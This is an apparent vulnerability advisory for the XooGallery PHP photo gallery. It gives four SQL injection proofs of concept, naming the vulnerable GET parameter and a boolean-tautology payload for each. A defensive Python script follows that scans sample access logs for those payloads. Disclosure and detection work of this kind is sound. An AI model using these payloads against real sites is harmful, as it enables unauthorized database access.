
XooGallery - Multiple SQL Injection

Author: Ahmet Ümit BAYRAM
Platform: php
Release date: 2019-03-26

# Exploit Title: XooGallery - Multiple SQL Injections
# Date: 26.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://xooscripts.com/product/html5-php-photo-gallery.html
# Demo Site: http://xooscripts.com/demos/xoogallery/
# Version: Latest
# Tested on: Kali Linux
# CVE: N/A

----- PoC 1: SQLi -----

Request: http://localhost/[PATH]/gal.php?gal_id=1
Vulnerable Parameter: gal_id (GET)
Payload: gal_id=29' AND 2692=2692 AND 'WCFf'='WCFf

----- PoC 2: SQLi -----

Request: http://localhost/[PATH]/photo.php?photo_id=1
Vulnerable Parameter: photo_id (GET)
Payload: photo_id=1' AND 5479=5479#

----- PoC 3: SQLi -----

Request: http://localhost/[PATH]/cat.php?cat_id=1
Vulnerable Parameter: cat_id (GET)
Payload: cat_id=1' AND 9338=9338 AND 'SZIH'='SZIH

----- PoC 4: SQLi -----

Request: http://localhost/[PATH]/results.php?p=1
Vulnerable Parameter: p (GET)
Payload: p=-8412' OR 2597=2597#
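As an added defender-side example that is not part of the advisory, the script below scans constructed access-log lines for the boolean-based pattern shared by the four payloads above (a closing quote, then AND/OR and a numeric tautology) and marks hits on the endpoint and parameter pairs the advisory names. The host path, client IPs and log lines are constructed; only the script-to-parameter mapping comes from the advisory.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoint -> GET parameter pairs named in the advisory above.
ADVISORY_PARAMS = {"gal.php": "gal_id", "photo.php": "photo_id",
                   "cat.php": "cat_id", "results.php": "p"}

# Signature shared by all four PoC payloads: a quote that terminates the
# string literal, then AND/OR followed by a numeric tautology such as 2692=2692.
TAUTOLOGY = re.compile(r"'\s*(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.IGNORECASE)

# Combined-log-format request line: client IP first, request target in quotes.
REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Constructed sample access-log lines (hypothetical host path and client IPs):
# the advisory's payloads URL-encoded, one benign request, and one probe
# against an endpoint the advisory does not list.
SAMPLE_LOG = """\
10.0.0.5 - - [26/Mar/2019:10:00:01 +0000] "GET /gallery/gal.php?gal_id=29%27%20AND%202692%3D2692%20AND%20%27WCFf%27%3D%27WCFf HTTP/1.1" 200 512
10.0.0.5 - - [26/Mar/2019:10:00:02 +0000] "GET /gallery/photo.php?photo_id=1%27%20AND%205479%3D5479%23 HTTP/1.1" 200 734
10.0.0.7 - - [26/Mar/2019:10:00:03 +0000] "GET /gallery/gal.php?gal_id=1 HTTP/1.1" 200 512
10.0.0.5 - - [26/Mar/2019:10:00:04 +0000] "GET /gallery/results.php?p=-8412%27%20OR%202597%3D2597%23 HTTP/1.1" 200 912
10.0.0.5 - - [26/Mar/2019:10:00:05 +0000] "GET /gallery/search.php?q=x%27%20OR%201%3D1%23 HTTP/1.1" 404 210
"""


def scan_log(text):
    """Return (client_ip, script, param, decoded_value, in_advisory) per hit;
    in_advisory is True when the script/parameter pair is one the advisory
    lists, so those hits can be triaged first."""
    findings = []
    for line in text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, target = m.groups()
        parts = urlsplit(target)
        script = parts.path.rsplit("/", 1)[-1]
        # parse_qsl percent-decodes values, so %27 becomes ' and %23 becomes #.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if TAUTOLOGY.search(value):
                known = ADVISORY_PARAMS.get(script) == name
                findings.append((ip, script, name, value, known))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The same TAUTOLOGY check can be applied to any parameter, not only the four listed, which is why the probe against the unlisted search.php endpoint is still reported, just with in_advisory set to False.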